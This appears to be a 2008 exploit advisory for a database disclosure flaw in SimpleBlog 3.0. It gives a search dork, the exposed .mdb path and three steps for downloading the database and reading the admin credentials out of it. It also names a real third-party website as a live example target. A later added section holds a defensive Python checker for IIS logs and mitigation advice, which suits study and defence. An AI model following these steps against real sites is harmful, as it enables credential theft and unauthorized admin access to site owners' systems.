
# Title : SimpleBlog 3.0 (simpleBlog.mdb) Database Disclosure Vulnerability
# Published : 2008-11-25
# Author : EL_MuHaMMeD


SimpleBlog 3.0 Mdb Vulnerability

----------------------------------------------------------
Author : EL_MuHaMMeD

Date : 26.11.2008

Contact : cwelmuhammed@gmail.com

-----------------------------------------------------------


Script : SimpleBlog 3.0

Download : http://www.8pixel.net/FetchFile.aspx?doc=simpleblog3.rar

Dork : "inurl:simpleblog3"

Our mdb path : db/simpleBlog.mdb

Exploits :

Step 1 - http://www.[target].com/[path]/simpleblog3/db/simpleBlog.mdb

Step 2 - Download the mdb file and read the admin name & password from the "users" table.

Step 3 - http://www.[target].com/[path]/simpleblog3/admin/default.asp

Example :

http://www.bvrg.org.uk/simpleblog3/db/simpleBlog.mdb

http://www.bvrg.org.uk/simpleblog3/admin/default.asp
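
Defender-side view of the three steps above, as an added example that is not part of the original advisory: a Python check over IIS W3C logs that flags a database file served with a 2xx status and whether the same client then requested a page under /admin/. The log lines, client addresses, field selection and the extra .accdb extension are constructed assumptions.

```python
# Added example: flag Access database downloads in IIS W3C logs.
# SAMPLE_LOG is constructed sample data, not real traffic.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status sc-bytes
2008-11-26 10:01:12 192.0.2.10 GET /simpleblog3/default.asp - 200 5120
2008-11-26 10:02:40 198.51.100.7 GET /simpleblog3/db/simpleBlog.mdb - 200 421888
2008-11-26 10:03:05 198.51.100.7 GET /simpleblog3/admin/default.asp - 200 2310
2008-11-26 10:04:00 203.0.113.5 GET /simpleblog3/db/simpleBlog.mdb - 404 0
2008-11-26 10:05:00 192.0.2.10 GET /simpleblog3/admin/default.asp - 200 2310
"""

# Assumption: file extensions treated as database files that must never be served.
DB_EXTENSIONS = (".mdb", ".accdb")

def parse_w3c(text):
    """Yield one dict per request, using the #Fields directive for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))

def find_db_disclosures(text):
    """Return one finding per client that was served a database file (2xx),
    noting whether that client later requested a page under /admin/."""
    findings = {}
    for req in parse_w3c(text):
        path = req["cs-uri-stem"].lower()
        ok = req["sc-status"].startswith("2")
        client = req["c-ip"]
        if ok and path.endswith(DB_EXTENSIONS):
            findings.setdefault(client, {
                "client": client,
                "db_path": req["cs-uri-stem"],
                "first_seen": req["date"] + " " + req["time"],
                "admin_after": False,
            })
        elif ok and "/admin/" in path and client in findings:
            findings[client]["admin_after"] = True
    return list(findings.values())

if __name__ == "__main__":
    for finding in find_db_disclosures(SAMPLE_LOG):
        print(finding)
```

Any finding means the accounts in the "users" table should be treated as exposed and their passwords changed. Moving the .mdb file outside the web root, or denying the extension in the web server, removes the exposure itself.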

 

----------------------------------------------------------------------

Cyber-Security.ORG - ELMuHaMMeD.COM

----------------------------------------------------------------------

# www.Syue.com [2008-11-25]